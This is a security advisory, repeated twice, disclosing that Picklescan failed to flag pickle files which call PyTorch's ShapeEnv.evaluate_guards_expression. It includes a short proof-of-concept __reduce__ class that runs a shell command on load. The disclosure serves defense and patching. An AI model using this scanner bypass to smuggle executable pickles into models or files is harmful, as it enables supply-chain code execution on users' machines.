Headline
GHSA-f4x7-rfwp-v3xw: Picklescan missing detection when calling pytorch function torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression
Summary
Using torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, which is a pytorch library function to execute remote pickle file.
Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn’t dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
PoC
import types
import torch.fx.experimental.symbolic_shapes as symbolic_shapes
class EvilTorchFxSymbolicShapesEvaluateGuardsExpression:
def __reduce__(self):
fake_self = str
code = "__import__('os').system('whoami')"
args = []
return symbolic_shapes.ShapeEnv.evaluate_guards_expression, (fake_self, code, args)
Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Corresponding
https://github.com/FredericDT https://github.com/Qhaoduoyu
Summary
Using torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, which is a pytorch library function to execute remote pickle file.
Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn’t dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
PoC
import types
import torch.fx.experimental.symbolic_shapes as symbolic_shapes
class EvilTorchFxSymbolicShapesEvaluateGuardsExpression:
def __reduce__(self):
fake_self = str
code = "__import__('os').system('whoami')"
args = []
return symbolic_shapes.ShapeEnv.evaluate_guards_expression, (fake_self, code, args)
Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Corresponding
https://github.com/FredericDT
https://github.com/Qhaoduoyu
References
- GHSA-f4x7-rfwp-v3xw
- mmaitre314/picklescan#47
- mmaitre314/picklescan@7f994d6
- https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28